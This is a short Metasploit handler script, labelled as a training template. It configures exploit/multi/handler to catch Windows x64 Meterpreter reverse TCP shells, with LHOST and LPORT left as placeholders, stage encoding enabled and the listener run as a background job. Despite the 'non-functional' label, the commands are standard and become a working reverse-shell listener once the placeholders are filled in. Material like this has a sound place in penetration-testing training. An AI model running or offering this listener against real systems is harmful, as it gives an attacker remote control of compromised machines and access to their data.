# Reverse TCP Handler Template
# For Training Use – Non-functional Template

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <LHOST>
set LPORT <LPORT>
set ExitOnSession false
set EnableStageEncoding true
exploit -j -z